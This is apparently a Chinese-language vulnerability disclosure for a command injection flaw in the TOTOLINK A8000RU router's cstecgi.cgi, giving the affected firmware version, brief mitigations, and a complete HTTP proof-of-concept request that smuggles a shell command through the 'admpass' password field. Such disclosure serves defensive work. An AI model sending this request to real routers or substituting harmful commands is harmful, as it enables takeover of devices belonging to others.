# A8000RU 命令注入漏洞总结 ## 漏洞概述 在 TOTOLINK A8000RU 路由器的 `cstecgi.cgi` 中发现命令注入漏洞。攻击者可以通过构造恶意请求,在路由器上执行任意操作系统命令。 漏洞成因: - 函数 `sub_41FBD0` 读取用户提供的参数 `admpass` - 该值被插入到 `v11` 变量中,并通过 `sprintf` 格式化 - 最终由 `CstSystem` 函数中的 `execv` 执行命令 ## 影响范围 - **厂商**: TOTOLINK - **产品**: A8000RU - **版本**: 7.1cu.643.b20200521 ## 修复方案 目前页面未提供具体的修复方案。建议: 1. 升级到最新安全版本 2. 对用户输入进行严格的过滤和验证 3. 避免直接使用用户输入执行系统命令 ## 概念验证代码 (PoC) ```http POST /cgi-bin/cstecgi.cgi HTTP/1.1 Host: 192.168.6.2 Content-Length: 80 X-Requested-With: XMLHttpRequest Accept-Language: en-US,en;q=0.9 Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 Origin: http://192.168.6.2 Referer: http://192.168.6.2/basic/index.html Accept-Encoding: gzip, deflate, br Cookie: SESSION_ID=21772465702.2 Connection: keep-alive {"topicurl":"setLoginPasswordCfg","admpass":" ls>./setLoginPasswordCfg.txt"} ``` **验证结果**: 提交上述 HTTP 请求后,成功创建了 `setLoginPasswordCfg.txt` 文件,其内容精确列出了文件夹中的文件名,确认命令 `ls>./setLoginPasswordCfg.txt` 已成功执行。